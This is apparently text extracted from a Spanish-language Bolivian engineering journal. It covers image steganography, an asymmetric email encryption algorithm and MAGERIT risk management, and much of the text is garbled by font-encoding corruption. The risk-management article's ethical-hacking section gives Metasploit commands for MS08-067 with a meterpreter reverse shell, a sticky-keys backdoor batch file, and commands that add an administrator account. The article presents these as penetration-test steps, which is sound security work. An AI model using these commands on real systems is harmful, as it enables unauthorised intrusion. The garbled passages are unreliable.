millones de colores). Cada píxel de un archivo BMP de 24 bits está representado por tres bytes. Cada uno de estos bytes contiene la intensidad de color rojo, verde y azul (RGB: red, green, blue). INGENIERÍA DEL SOFTWARE La Ingeniería de Software es una disciplina de la ingeniería que comprende todos los aspectos de la producción de software desde las etapas iniciales KLSHLZWLJPÄJHJP}UKLSZPZ[LTHOHZ[HLSTHU[LUPmiento de este después que se utiliza, tiene como meta el desarrollo de software de calidad. MÉTODOS DE CRIPTOGRAFÍA MODERNOS La criptografía es la ciencia que estudia los métodos y procedimientos, mediante algoritmos ma[LTm[PJVZWHYHTVKPÄJHYSVZKH[VZKL[HSTHULYH que solamente las personas que tengan la llave adecuada puedan tener acceso a la versión original `HZLN\YHYX\LSVZKH[VZUVM\LYVUTVKPÄJHKVZLUtre el remitente y el destinatario. MÉTODOS SIMÉTRICOS Utiliza una clave para la encriptación y desencriptación del mensaje. Esta clave se debe intercambiar entre los equipos por medio de un canal seguro. Ambos extremos deben tener la misma clave para cumplir con el proceso. MÉTODOS ASIMÉTRICOS Se basa en el uso de dos claves diferentes, claves que poseen una propiedad fundamental: una clave puede desencriptar lo que la otra ha encriptado. Una de las claves de la pareja, llamada clave pri- METODOLOGÍA PARA EL DESARROLLO DEL SOFTWARE Se hizo referencia a la Ingeniería de Software y lo que abarca como ser el software, las distintas metodologías de desarrollo que existen y entre ellas se eligió MPR, Metodología de Prototipado Rápido, debido a que está orientada al desarrollo de prototipos y fuertemente apoyada en tecnología de Bases de Datos y herramientas visuales para Desarrollo Orientado a Objetos. De las seis fases para el desarrollo en las cuales se basa la metodología, en el presente trabajo hará uso de las siguientes fases: Fase 1:+LÄUPJP}UKLLZWLJPÄJHJPVULZLZ[H primera fase tiene por objeto auditar la información de relativa al problema. Fase 2: Diseño Conceptual, el objetivo de esta fase es construir un modelo de informaJP}U X\L YLÅLQL LS LZX\LTH JVUJLW[\HS KLS prototipo. Fase 3: Desarrollo del Prototipo, esta fase tiene por objeto la construcción del primer prototipo operativo de la Aplicación. Fase 4: Pruebas del Usuario, en esta fase se realizarán todas las pruebas necesarias para validar el prototipo desarrollado en la fase anterior. Figura 2: Algoritmo RSA – Cifrar P A ALGORITMOS APLICADOS Se utilizan algoritmos de criptografía simétricos y HZPTt[YPJVZ ,S HSNVYP[TV JYPW[VNYmÄJV ZPTt[YPJV aplicado en el sistema es el algoritmo DES presen[HKVLUSHÄN\YH R Figura 1: Algoritmo DES A D I Fuente: José Gargallo Tuzón ,SHSNVYP[TVJYPW[VNYmÄJVHZPTt[YPJVHWSPJHKVLULS sistema es el algoritmo RSA, para cifrar y descifrar un mensaje utilizando este algoritmo se deben aplicar dos algoritmos. El algoritmo RSA para cifrar se T\LZ[YHLUSHÄN\YH Fuente: elaboración propia G M A 55 P El algoritmo RSA para descifrar se muestra en la ÄN\YH Figura 4: (SNVYP[TVLZ[LNHUVNYmÄJVIHZHKVLU3:) Figura 2: Algoritmo RSA – Cifrar A R A D I Fuente: elaboración Propia G Fuente: elaboración propia M A 56 El desarrollo del sistema propuesto hace uso del Tt[VKVKLLZ[LNHUVNYHMxH¸)P[TLUVZZPNUPÄJH[P]V¹ y con el modelo RGB. Se hace uso de este método debido a la inserción de caracteres ascii en pixeles, variando el color de un carácter en lo más mínimo para que no sea detectada ninguna alteración en la imagen por el ojo humano. Un ejemplo de la aplicación del algoritmo previamente expuesto utilizado para ocultar una letra, saltando el paso del cifrado, en una imagen se detalla a continuación. La letra “A” tiene un valor binario de: 01000001. Insertando ese valor binario, bit a bit, en una imagen )47ZLVI[PLULLSYLZ\S[HKVKLZJYP[VLUSHÄN\YH Figura 5: Inserción de la Letra A Para ocultar la información en imágenes BMP se OPaV\ZVKLSHSNVYP[TVWYLZLU[HKVLUSHÄN\YH Fuente: Elaboración Propia ,S IP[ TLUVZ ZPNUPÄJH[P]V JVUZPZ[L LU LS S[PTV IP[ de un byte de uno canal de los tres canales de un WP_LS 3H TVKPÄJHJP}U YLHSPaHKH LU SVZ IP[Z UV LZ perceptible ante los ojos humanos. Sólo se utilizan 8 de los 9 bytes obtenidos de la agrupación de 3 pixeles. La información que se encuentra oculta en una imagen se encuentra segura pero puede ser alterada si la imagen es comprimida. :L YLHSPaH SH ]LYPÄJHJP}U KLS [PLTWV KL KLZJPMYHKV en meses que tardaría un interceptor en obtener la información reservada mediante ataques de fuerza bruta a un mensaje cifrado con el método de sustitución simple debido a que es el más utilizado y a imágenes que contienen información cifrada con los algoritmos DES y RSA dentro de sus pixeles. La Tabla 1 muestra el resultado de la variación del tiempo de descifrado y el incremento porcentual del sistema propuesto con el método de sustitución simple. Tabla 1 Variación del tiempo de descifrado Sustitución Simple IMAGEN/ RSA IMAGEN/ DES Variación % 68,109 528,102 - 675,38 % 68,109 - 547,068 703,22 % Fuente: Elaboración Propia De acuerdo a la tabla 1 se determina que el sistema propuesto tiene un incremento mayor a 600% en el tiempo de descifrado con los algoritmos DES y RSA. Un interceptor tarda 6 veces más en descifrar una imagen que posee información oculta que un mensaje cifrado con el método de sustitución simple. CONCLUSIONES Se desarrolla una herramienta para mantener la información segura en el proceso de envío y recepción garantizando el incremento en el nivel de se- N\YPKHK[HU[VLUSHJVUÄKLUJPHSPKHK`SHPU[LNYPKHK Aplicar métodos de esteganografía al cifrado de mensajes permite incrementar el nivel de seguridad en el envío de información ya que evita que un interceptor se dé cuenta que el objeto portador, una imagen bmp en el caso del presente trabajo, contiene información oculta. En la utilización de la esteganografía, uno de los campos de investigación más activas es herramientas de detección de masas para los contenidos ocultos. Pero las pruebas estadísticas conocidos son frágiles y los programas de incrustación no determinan que exactamente se encuentra oculto. El [YmÄJVKLOV`LUSHZYLKLZWISPJHZLZ\UWYVISLTH que resulta muy difícil de comprobar rigurosamente cada archivo que circula en las redes. REFERENCIAS BIBLIOGRÁFICAS (UKLYZVU 9 HUK 7L[PJVSHZ - ¸6U [OL SPTP[Z VM streganography”, IEE Journal on Selected Areas in Communications, vol. 16. 1998. *VYSL[[P ,Z[YHKH (SLQHUKYV Documento denoTPUHKV! 0:6 L 0:6 Viena 2007. Disponible en Web: http://blog.hispasec.com/ laboratorio/images/noticias/ISO-27001_e_ISO27004.pdf +VTxUN\La ,ZWPUVaH ,KNHY <YPLS ` 7HJOLJV Gómez Leonardo. Criptografía, trabajo denominado “Algoritmos de Criptografía Clásica”. UNIVERSIDAD NACIONAL AUTÓNOMA DE MÉXICO. 2007. 05;,*60nstituto Nacional de Tecnologías de la *VT\UPJHJP}U(Y[PJ\SVKLUVTPUHKV!¸,Z[LNHUVgrafía, el arte de ocultar información” 2LUUL` 7 9PLNLY - Guía de práctica privada KLUVTPUHKH! ¹:[LNHUVNYHWO` BVUSPULD (SS 5L[ Tools – Library – Privacy Guide. Html” Disponible en Web: http://www.all-nettools.com/library. privacy3 4LOKP ROHYYHaP /VZYL] ; Sencar, and Nasir 4LTVU ¸PTHNL Z[LNHUVNYHWO`! *VUJLW[Z HUK practice”, in Proceeding of the IEE. 1998. P A R A D I G M A 57 ALGORITMO DE ENCRIPTACIÓN PARA ENVIO Y RECEPCIÓN DE MENSAJES DE CORREO ELECTRÓNICO BAJO NORMA ISO 27002 P A R A D I G M A 58 Jorge Andrés Martínez Choquetarqui Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería La Paz - Bolivia e-mail: [email protected] RESUMEN En el presente artículo se presenta el desarrollo de un algoritmo de encriptación dentro del Ejército a través de un modulo parte de un sistema gestor de correo electrónico, de tal manera que pueda asegurarse la seguridad de este en términos de conÄKLUJPHSPKHKLPU[LNYPKHKLULSLU]xVKLTLUZHQLZ dentro de la institución donde vaya a aplicarse, ya que la información que se transmite es demasiado sensible para ser libremente transmitida por un medio inseguro como son las redes actuales. INTRODUCCIÓN En los últimos años la criptografía se ha convertido en una ciencia de enorme importancia y a la cual se le destina cada vez un tratamiento serio y cien[xÄJVKLMVYTH[HSKLSVNYHYJVT\UPJHJPVULZZLN\ras. Como se verá esto no es una tarea para nada sencilla. Uno de los puntos que siempre estuvo en discusión sobre el almacenamiento de información en computadoras digitales, fue la seguridad de los TPZTVZMYLU[LHWVZPISLZWtYKPKHZKLJVUÄKLUJPHlidad, desde que la primera computadora hizo su aparición en alguna organización militar o gubernamental la necesidad de resguardar la información allí almacenada se hizo evidente. El trabajo de grado desarrollado tuvo como objetivo Diseñar un Algoritmo de encriptación para la transrecepción de mensajes dentro del Correo Electrónico Institucional del Ejército de Bolivia bajo la noma ISO 27002 para reducir las vulnerabilidades KLZLN\YPKHK[HU[VLUJVUÄKLUJPHSPKHKLPU[LNYPKHK en el envío y recepción de mensajes privados. PROBLEMÁTICA El envío y recepción actual de mensajes por el Correo Electrónico Institucional dentro del Ejército de Bolivia presenta vulnerabilidades de seguridad [HU[VLUJVUÄKLUJPHSPKHKLPU[LNYPKHKLUSH[YHUZ- recepción de mensajes privados ocasionando que existan ataques de seguridad sobre el sistema gestor de correo actual. Tomando como referencia el anterior problema se inició el proceso de desarrollo del algoritmo tomando como base las matemáticas discretas; y más LZWLJxÄJHTLU[LSHHYP[Tt[PJHTVK\SHY JUSTIFICACIÓN Si bien existen muchos modelos de encriptación actuales (RSA, AES, etc.) las razones para elegir un HSNVYP[TVU\L]VZLQ\Z[PÄJHUKLHJ\LYKVHSVZJYPterios siguientes: +LMVYTH[tJUPJHZL[PLULUSHZOLYYHTPLU[HZ necesarias, así como los elementos adecuados para crear un nuevo elemento de seguridad para un medio que no explota sus beneÄJPVZJVTVLZLSJVYYLVLSLJ[Y}UPJV ;LJUVS}NPJHTLU[L WVYX\L \UH OLYYHTPLU[H nueva de cifrado brinda un nivel de seguridad más adecuado a la institución debido a que inicialmente solo el encargado de la institución conoce el funcionamiento del algoritmo. ,JVU}TPJHTLU[L WVY LS HOVYYV KL [PLTWV ` optimización de procesos actuales que brinda la solución relativo al problema. DESARROLLO DEL ALGORITMO La metodología la cual dirige el proyecto es la de desarrollo de algoritmos, debido a que el proyecto se enfoca a la realización de un algoritmo de encriptación, sin embargo cada de los pasos de esta metodología necesita o trabaja en conjunción con otras metodologías, las cuales en este caso son el Análisis de Riesgos y desarrollo de Software. Por lo tanto, las 4 fases desarrolladas de la solución LTWPLaHUJVUSHJVTWYLUZP}UKLSWYVISLTHWHYHÄnalizar con la Evaluación de la solución. Comprensión del Problema Es aquí donde se realizó el análisis de los datos que están involucrados en el algoritmo. Dentro de este paso se encuentra la Metodología SRM para análisis de riesgos la cual se encargará de brindar SVZJVU[YVSLZJYPW[VNYmÄJVZIHQVUVYTH0:6SVJ\HS sirve como base de políticas para el algoritmo; de este paso se extrajeron las normas aplicables, concluyendo en la necesidad de un algoritmo asimétrico. Planteamiento de la Lógica Para esta fase se realizaron los siguientes pasos: :L LSPNP} HS +PHNYHTH KL -S\QV JVTV YLWYLsentación del algoritmo en su totalidad. 7HYHSHYLWYLZLU[HJP}UTH[LTm[PJHZL[VTHron en cuenta la aritmética modular; y como principios de ésta se cita a la siguiente: representante cero (0), o también [0] constituida por los números cuya diferencia sea par (los números pares) y la clase de equivalencia con representante uno (1), o también [1] constituida por los números impares. P En base a la segmentación de grupos en clases de equivalencia puede realizarse la exponenciación modular de números, la cual se basa en el principio de que si se eleva un número x a la potencia n, y de ese resultado se obtiene su residuo con z, entonces el resultado, xn mod z= y, elevado a un número inverso w y que este dentro del conjunto mod z, devuelve el número x original; lo cual para el modelo de criptografía de clave asimétrica es fundamental debido a la variedad obligatoria de las claves. A <UH ]La KLÄUPKH SH S}NPJH ZL NLULYH LS HSNVYP[TV como tal, compuesto de los siguientes Diagramas KL-S\QVJHKH\UVWVY\UWYVJLZVLULZWLJxÄJV! Proceso de Generación de Claves Relaciones de Congruencia Módulo N Sea Z el conjunto de números enteros y R la relaJP}UZVIYLAKLÄUPKHWVYSHZPN\PLU[LL_WYLZP}U! R A D 9$b_` ?í?_¶`LZTS[PWSVKLd La relación entre x y y, x R y se escribe con el símbolo: I _ `TVK Que se lee “x es congruente con y módulo 2”. La YLSHJP}UHZxKLÄUPKHLZ\UHYLSHJP}UKLLX\P]HSLUJPH sobre el conjunto de los números enteros porque: 7HYH[VKV_ ?ZLJ\TWSLX\L_ _TVK `HX\LH¶H$$íX\LLZTS[PWSVKL `WVY[HU[VSHYLSHJP}ULZYLÅL_P]H :LH_ `TVKLU[VUJLZ_¶`$R R Z, entonces, y –x = 2(-k) y por lo tanto, y – x [HTIPtULZ\UTS[PWSVKLLZKLJPY!` _ (mod 2) y por tanto, la relación es simétrica. :P_ `TVK`` aTVKLU[VUJLZ!_¶ y = 2k1; y – z = 2k2 +VUKLR`RZVUUTLYVZLU[LYVZ:\mando miembro a miembro las dos ecuaciones anteriores se obtiene: x – z = 2(k1 + RSVX\LZPNUPÄJHX\L_ aTVK`WVY [HU[V_ `TVK ` aTVKLU[VUJLZ _ aTVK`SHYLSHJP}ULZ[YHUZP[P]H Esta relación de congruencia módulo 2 determina una partición del conjunto de los enteros Z en dos clases de equivalencia: la clase de equivalencia con G M Dónde: 3LZWYPTVYVI\Z[VWHYHVWLYHJPVULZJYPW[VNYmÄJHZ HLZLSUTLYVKL-LYTH[JVUU$ A 59 P A R W`XZVUUTLYVZHSLH[VYPVZX\LJ\TWSLUSH condición de primos probables. *mSJ\SVKLUKLHJ\LYKVHM}YT\SH *mSJ\SVKL UKLHJ\LYKVHM}YT\SH YLZSHPU]LYZHTVK\SHYLU[YLL` USHJ\HS se calcula aplicando el Teorema Chino del Resto. .LULYHY \ZHUKV LS 7LX\L|V ;LVYLTH KL Fermat: QPLZ\UUTLYVHSLH[VYPVJVTWYLUKPKVLU[YL 2 y L-1. *mSJ\SVKLaKLHJ\LYKVHM}YT\SH +L]VS\JP}UKL+H[VZ Proceso de Cifrado de Mensajes .LULYHJP}UKL JVTVHSLH[VYPVJVTWYLUKPdo entre 2 y L-1. *HSJ\SVKL]HYPHISLKLHWLY[\YH`KLa»ZLgún fórmula. 7YPTLYH JHWH KL LUJYPW[HKV ZVIYL LS ]LJ[VY de elementos numéricos Kp. :LNTLU[HJP}U KLS U\L]V ]LJ[VY LU ISVX\LZ numéricos compatibles con la segunda capa de encriptado. :LN\UKHJHWHKLLUJYPW[HKVZVIYLLS]LJ[VY creado generando el mensaje cifrado. 9L[VYUVKLKH[VZLSTLUZHQLJPMYHKVSH]HYPHISLKLHWLY[\YH``\U]LYPÄJHKVYPU[LYUV Proceso de descifrado de Mensajes A D I G M A 60 Dónde: Dónde: LX\P]HSLU[L2 JVU]PLY[L LS [L_[V WSHUV 2 LU su equivalente numérico ASCII y segmentar por letra :LYLHSPaHSHPU[YVK\JJP}UKLSHJSH]LWISPJH del destinatario ISVX\LZ^W YLHSPaH SH ZLNTLU[HJP}U PU[LYUH del texto cifrado para compatibilizarlo con las operaciones de descifrado. ^BDJVU[PLULSHWYPTLYHJHWHKLKLZJPMYHKV! aplicada a cada elemento segmentado en el anterior paso. *mSJ\SVKLTKLHJ\LYKVHM}YT\SH 6I[LULYLSPU]LYZVTVK\SHYKLT`3HWSPJHUdo Teorema Chino del Resto. 2WBDJVU[PLULSH:LN\UKHJHWHKLKLZJPMYHdo: sobre cada elemento del vector w. <UP}UKL[VKVZSVZZLNTLU[VZNLULYHKVZLU uno solo: el mensaje original K. 6I[LUJP}UKLSTLUZHQLVYPNPUHS2 +LÄUPKVLSWSHU[LHTPLU[VZLWYVJLKP}HSHJVKPÄcación, donde se obtuvieron los resultados de la aplicación del algoritmo al módulo software. *VKPÄJHJP}UKLS7YVISLTH En esta fase se procedió al paso de la lógica representada en el Diagrama de Flujo a un lenguaje máquina, en este caso a PHP. Esta fase junto con la siguiente trabajan con la metodología de desarrollo de Software XP, dividido en las siguientes fases: Fase 1 – Planeación: Donde se obtuvieron SHZ LZWLJPÄJHJPVULZ NLULYHSLZ KLS 4}K\SV! Historias de usuario y el contexto de desarrollo. Fase 2 – Diseño: Desarrollo de los prototipos de las interfaces usando como referencia a las historias de usuario. Fase 3 ¶ *VKPÄJHJP}U! (X\x ZL \UPLYVU SHZ metodologías para generar el código en PHP del algoritmo e introducirlo en las interfaces. Fase 4 – Pruebas: De aceptación y unitarias, ZL[LZ[L}\UJVT\UPJHKVVÄJPHSKLS,QtYJP[V con resultados exitosos. Evaluación y ejecución de la Solución Una vez que se terminó de escribir el algoritmo es necesario comprobar que realiza las tareas para las que ha sido diseñado y produce el resultado correcto y esperado. Para comprobar el funcionamiento global del algoritmo se realizaron pruebas con textos de diferente índole generados por herramientas que se encargan de evaluar la consistencia del algoritmo, los cuales terminaron siendo positivos para los resultados esperados. CONCLUSIONES Este articulo presenta las directrices generales para el desarrollo de un algoritmo de encriptación basado en un modelo asimétrico que sea capaz de responder a las necesidades de la institución donde se aplica. Los procedimientos por los cuales pasa el desarrollo son metodologías generales aplicadas a cubrir requerimientos de Seguridad de la Información; sin embargo, para que estos requerimientos sean tomados en cuenta, no deben basarse en opiniones propias sino en normas. Es por eso que el presente trabajo está enfocado sobre la norma ISO 27002 y los controles de criptografía existentes que sirven como directrices de diseño y desarrollo. Así mismo, para futuros algoritmos, se pueden tomar las referencias matemáticas de éste, ya que son principios universales que rigen la criptografía como tal. Además se recomienda probar diferentes alternativas de desarrollo de algoritmos como redes neuronales, circuitos o teorías recientes como los fractales, con el objetivo de tener métodos de seguridad de la información variados y robustos. Con el algoritmo concluido y cada paso terminado, se puede concluir que cada objetivo propuesto a sido cumplido a cabalidad. REFERENCIAS BIBLIOGRÁFICAS 4HZZHJO\ZL[[Z0UZ[P[\[LVM;LJOUVSVN`“La Crip[VNYHMxH!,ZJYP[\YH6J\S[H¹ Articulo del 24 de Octubre del 2010. (UKYL^Z .LVYNL ¸Number Theory”, Dover, 1994 7OLI` 1¹ Methodology and Economics”, Ed. MacMillan Press LTD, Londres., 1988. .HSLUKL 1\HU *HYSVZ ¸/PZ[VYPH KL SH LZJYP[\YH Cifrada¹,K*VTWS\[LUZL¡,KPJP}U4HKYPK España, 1995. P A R A D I G M A 61 DESARROLLO E IMPLEMENTACIÓN DEL PROCESO DE GESTIÓN DE RIESGOS EN BASE A MAGERIT P A R A D I G M Rocio Fabiola Angulo Velasquez Departamento Ingeniería de Sistemas – Escuela Militar de Ingeniería La Paz – Bolivia E-mail: [email protected] RESUMEN El articulo presenta el desarrollo del proceso de gestión de riesgos para evidenciar vulnerabilidades y amenazas de un sistema a través de la realización del análisis de riesgos considerándola como una aproximación metódica para determinar el riesgo siguiendo pasos pautados por la metodología MAGERIT y dando lugar a la gestión de riesgos que permitirá el mantenimiento de un entorno controlado, minimizando los riesgos hasta niveles aceptables precautelando así la información. de sistemas, métodos y herramientas destinados a proteger la información. El análisis de riesgos es una aproximación metódica que determina el riesgo siguiendo pasos pautados y dando así lugar a la gestión de riesgos que permitirá el mantenimiento de un entorno controlado, minimizando los riesgos hasta niveles aceptables. La reducción de estos niveles se realizará mediante el despliegue de medidas de seguridad, que establecerá un equilibrio entre la naturaleza de los datos y los tratamientos, los riesgos a los que estén expuestos y las medidas de seguridad. ABSTRACT This paper presents the development of the process of administration of risks to evidence vulnerabilities and threats of the system through the realization of the analysis of risks considering it like a methodical approach to determine the risk following steps averaged by the methodology MAGERIT and giving place to the administration of risks that will allow the maintenance of a controlled environment, minimizing this way the risks until levels acceptable to preserve the information. PALABRAS CLAVE Proceso de gestión de riesgos, análisis de riesgos, MAGERIT, activos, amenazas, salvaguardas, tratamiento, seguridad. Introducción. A La importancia de seguridad crece día a día, su inÅ\LUJPH HMLJ[H KPYLJ[HTLU[L H SHZ HJ[P]PKHKLZ KL cualquier entorno informatizado, por lo cual se hace necesario conocer si los sistemas informáticos están protegidos de cualquier tipo de intrusiones. 62 Tomando en cuenta la idea “lo que no está permitido debe estar prohibido” y para garantizar la seguridad informática, se requiere de un conjunto Existen diversas metodologías para realizar este proceso, siendo la implementación metodología MAGERIT la que se utilizara para procurar evidenciar vulnerabilidades y amenazas, precautelando así la información. Por lo tanto, el propósito de este estudio es el desarrollo e implementación del proceso de gestión de riesgos en base a MAGERIT para mitigar las vulULYHIPSPKHKLZ`SVZYPLZNVZX\LZLHUPKLU[PÄJHKVZ Se considera de forma sucesiva: la realización de pruebas de Ethical Hacking para evidenciar vulnerabilidades de seguridad, la realización de un análisis `L]HS\HJP}UKLYPLZNVZHWHY[PYKLSHPKLU[PÄJHJP}U de amenazas y vulnerabilidades para determinar el nivel de riesgo general de la información y establecer prioridades, la determinación del plan de acción adecuado al diagnóstico y a las necesidades del sistema de información para prevenir, impedir, reK\JPYVJVU[YVSHYSVZYPLZNVZPKLU[PÄJHKVZ`LSKLZHrrollo de un sistema informático para coadyuvar al proceso de la gestión de riesgos de la información. Problemática. “Las medidas de seguridad de la información se basan en criterio empírico y conocimiento aislado de los responsables del sistema de información lo cual genera vulnerabilidades en la seguridad del TPZTVZPNUPÄJHUKV\UYPLZNV¹ *VUVJPTPLU[V SPTP[HKV KL SHZ ]\SULYHIPSPKHdes de seguridad de la información. 3PTP[HJP}U LU SH KL[LYTPUHJP}U KLS UP]LS KL riesgo de la información y establecimiento de su prioridad. ,SUP]LSKLYPLZNVKLSHPUMVYTHJP}UUVLZYLgulado conforme a planes de acción adecuados. 3H NLZ[P}U KL YPLZNVZ KL SH PUMVYTHJP}U ZL realiza de forma manual. Ethical Hacking. Para dar paso a la gestión de riesgos se evidencian vulnerabilidades, comprobando que existen debilidades respecto a la seguridad de la información. ,SL[OPJHSOHJRPUNLZHJV[HKVLU[PLTWVYLÅLQHSH situación real y debido a que es posible llegar o no a los límites de lo que haría un atacante, este proceso solo respaldará la necesidad de llevar a cabo el proceso de gestión de riesgos de la información. Windows anteriormente, y puertos abiertos PKLU[PÄJHKVZ WLYTP[L [VTHY JVU[YVS KL V[YV SO, lo que se conoce como puertas traseras. Usando los comandos: >use exploit/windows/smb/ms08_067_netapi >set RHOST ip_objetivo >set payload windows/meterpreter/reverse_ tcp_allports >set LHOST ip_propio >set LPORT puerto_abierto >exploit se puede lograr acceder remotamente a otro PC o servidor, en caso de no tener parches de seguridad actualizados, caso contrario el acceso es denegado, y este es el caso del objetivo anteriormente escaneado. Como no se accedió por puerta trasera, se prueban otro tipo de accesos, considerando que el objetivo es un SO Windows se comprobó que la conexión a escritorio remoto esta activa (Figura 2), pero para el acceso se necesita usuario y password. Las herramientas mencionadas a diferencia de otras son libres, de fácil manejo y automatizadas, lo que facilita el proceso, minimiza el tiempo en el que se lleven a cabo las pruebas y no requieren de conocimientos expertos en diferentes SO o redes. - Metasploit, a través de exploits según la caYHJ[LYxZ[PJH KLS :6 X\L ZL PKLU[PÄJ} JVTV R A I Figura 7: Conexión a escritorio remoto activa by Microsoft Windows. Mediante ingeniería social se logra que la víctima del ataque ejecute el archivo batch: Figura 6: Escaneo de conexiones de red con ZENMAP. A D Para realizar el Ethical Hacking se consideran las pruebas de penetración, con ayuda de algunas herramientas como Zenmap y Metasploit. ALUTHWWVYSHPU[LYMHJLNYmÄJHX\LWYVWVYJPVUH LZ MmJPS PKLU[PÄJHY JHYHJ[LYxZ[PJHZ KLS SO y puertos abiertos del objetivo, es decir a quien se atacará (Figura 1), para lo cual se ejecuta el comando “nmap –T4 –A –v ip_objetivo” y “nmap -p 1-65535 -T4 -A –v ip_objetivo”. P echo off title . *VW` ¸J!C^PUKV^ZCZ`Z[LTCZL[OJL_L¹ ¸J!C ^PUKV^ZCZ`Z[LTCZL[OJaaa¹ *VW` ¸J!C^PUKV^ZCZ`Z[LTCJTKL_L¹ ¸J!C ^PUKV^ZCZ`Z[LTCZL[OJL_L¹ del %0 exit Con la ejecución de este código se activa el símbolo del sistema en lugar de la opción Stick Key de Windows, con lo que se ha creado una puerta G M A 63 P trasera al SO desde la conexión al escritorio remoto activado donde se ejecutan las siguientes líneas de comando: >net user xx xx /add >net localgroup Administradores xx /add A R A D I G M A 64 Al crear un usuario con privilegios de administrador en el SO del objetivo se puede acceder al mismo y tener acceso a la información almacenada allí, y es WVZPISLYLHSPaHYTVKPÄJHJPVULZWHYHKLULNHJP}UKL HJJLZVTVKPÄJHJP}UVLSPTPUHJP}UKLPUMVYTHJP}U con lo que se evidenciaron vulnerabilidades. Proceso de gestión de riesgos. La versión 3.0 de MAGERIT considera que el análisis de riesgos permite determinar cómo es, cuánto vale y cómo de protegido se encuentra un sistema. En coordinación con los objetivos, estrategia y política de la Organización, las actividades de tratamiento de los riesgos permiten elaborar un plan de seguridad que, implantado y operado, satisfaga los objetivos propuestos con el nivel de riesgo que acepta la Dirección. Al conjunto de estas actividades se le denomina Proceso de Gestión de Riesgos. Considerando que las organizaciones requieren demostrar que realizan una gestión competente y efectiva de la seguridad de los recursos y datos que gestionan debido a las auditorías tanto internas como externas a las que son sometidas, es necesario realizar un análisis de riesgos, al ser éste el paso previo que da lugar a una auditoria y por lo cual se considera la existencia de normas que se deben tomar en consideración. Para la elección de la metodología del proceso de gestión de riesgos se toma en cuenta diversos estudios como el de Padilla P. Cristina realizado el 2012 y titulado “Análisis y Gestión de Riesgos Informáticos para la protección de los Sistemas de Información en el Área de Tecnologías Informáticas del Gobierno Provincial de Tungurahua”, donde concluye luego de haber realizado un análisis comparativo de diversas metodologías, seleccionar MAGERIT, por las siguientes razones: 4(.,90; [YHIHQH JVU PUMVYTHJP}U KPNP[HS ` sistemas informáticos para ser analizados. 7LYTP[LZHJHYPUMVYTHJP}UVSVZZLY]PJPVZKLS sistema, los cuales son valiosos para MAGERIT ya que permite saber el grado de riesgo que se encuentra cada activo y así poder protegerlo. 6MYLJL\UTt[VKVZPZ[LTH[PaHKVWHYHHUHSPzar los riesgos. (`\KH H PKLU[PÄJHY ` WSHUPÄJHY TLKPKHZ ULcesarias para reducir los riesgos. )YPUKHOLYYHTPLU[HZX\LH`\KHUHMHJPSP[HYLS análisis de Riesgos. Por otra parte el estudio de Rubio R. Sandra realizado el año 2005 y titulado “Desarrollo de una herramienta de gestión de riesgos de proyectos software”, concluye: 3HTL[VKVSVNxHKLHUmSPZPZ`NLZ[P}UKLYPLZgos MAGERIT, ayuda a enfocar el problema de la seguridad desde una perspectiva completa, y que evoluciona en el tiempo. 4(.,90;J\LU[HJVUOLYYHTPLU[HZX\LYLHSPzan gestión de riesgos siguiendo la metodología. ,Z WVZPISL HWSPJHY SH 4L[VKVSVNxH 4(.,90; en proyectos de Software ya que es una metodología completa con la que se puede crear o desarrollar Software Matalobos V. Juan Manuel desarrolla un estudio el año 2009 cuyo título es “Análisis de riesgos de seguridad de la información” donde realiza un análisis comparativo entre diversas metodologías de análisis de riesgos entre las que se encuentran la ISO 27005:2008, UNE 71504:2008, BS 7799-3:2006, AS/NZS 4360:2004, OCTAVE, CRMM, NIST SP 800-30, IRAM, CORAS, SOMAP, FAIR y MAGERIT. Como resultado del análisis se obtienen las siguientes conclusiones respecto a MAGERIT: ,SHSJHUJLKLSHTL[VKVSVNxHSSLNHHSHUmSPZPZ y gestión de riesgos. ,S [PWV KL HUmSPZPZ LZ JVTWSL[V ` W\LKL ZLY cuantitativo o cualitativo, pero no mixto ,S[PWVKLYPLZNVX\LJVUZPKLYHLZPU[YxUZLJV y efectivo, pero no residual 3VZLSLTLU[VZKLSTVKLSVX\L[VTHLUJ\LUta corresponden a los activos, las dependencias, las amenazas y las salvaguardas; por el contrario no considera los procesos, los recursos y las vulnerabilidades. 3VZVIQL[P]VZKLZLN\YPKHKX\LWLYZPN\LZVU SVZ KL JVUÄKLUJPHSPKHK PU[LNYPKHK KPZWVUPbilidad, autenticidad y trazabilidad. *VUZPKLYHPU]LU[HYPVZKL[PWVZKLYLJ\YZVZ` HTLUHaHZ WLYV ZVSV KLÄUL \UH [H_VUVTxH de salvaguardas. 9LZWLJ[VHSHZH`\KHZX\LVMYLJLWHYHSHPTWSHU[HJP}UKLÄULLSWSHUKLWYV`LJ[VZIYPUda técnicas y roles para llevarlos a cabo por ser una herramienta comercial. Tomando en cuenta los estudios previamente mencionados para el desarrollo del proceso de gestión de riesgos se toma opta por la elección de la metodología MAGERIT además que sigue parámetros de la ISO 31000, considera análisis cuantitativo o cualitativo, actualmente se encuentra en su tercera versión por lo que se ha perfeccionado y para evitar malinterpretaciones describe detalladamente su desarrollo y sugiere herramientas para el mismo en tres libros (Figura 3). conforme plantea MAGERIT, y se muestra a continuación: AMENAZAS Símbolo Criterio [N] Desastres Naturales [I] De Origen Industrial [E] Errores y Fallos No Intencionados [AI] Ataques Intencionados Posteriormente se reconocieron 41 salvaguardas empleadas en las mismas 11 áreas, a partir de las cuales y tomando en cuenta la valoración previa de activos, amenazas, salvaguardas y las fórmulas de: KL[LYTPUHJP}UKLS5P]LSKL0TWHJ[V$%0Tpacto=Valor*Degradación KL[LYTPUHJP}UKLS,Z[HKVKL9PLZNV$%9PLZgo=Impacto*Frecuencia :LPKLU[PÄJHYVUYPLZNVZ Figura 3: Organización de los libros de MAGERIT –versión 3.0. La metodología propone la realización tanto del análisis de los riesgos y como la gestión de riesgos que se realizan a partir de diferentes acciones (Figura 4). Seguidamente se realizó la evaluación de los niveles de riesgo que una violación de la seguridad tiene y pueden ser Muy Alto, Alto, Medio, Bajo y Muy Bajo (Figura 5), con un grado de riesgo estimado en 61.71%; se señalan las amenazas que se consideran riesgos inaceptables (Figura 6), es decir, las que presentan niveles de riesgos Muy Alto, Alto y Medio para consecutivamente en común acuerdo con la organización determinar su tratamiento. P A R A D I G Figura 4: Organización del proceso de gestión de riesgos según MAGERIT –versión 3.0. Figura 5: Porcentaje de riesgos estimados como resultado del análisis de riesgos en base a MAGERIT–versión 3.0. La realización de un análisis de los riesgos implica PKLU[PÄJHJP}U ` ]HSVYHJP}U KL HJ[P]VZ HTLUHaHZ ` salvaguardas mediante el uso de checklist, y entrevistas para poder calcular el impacto y 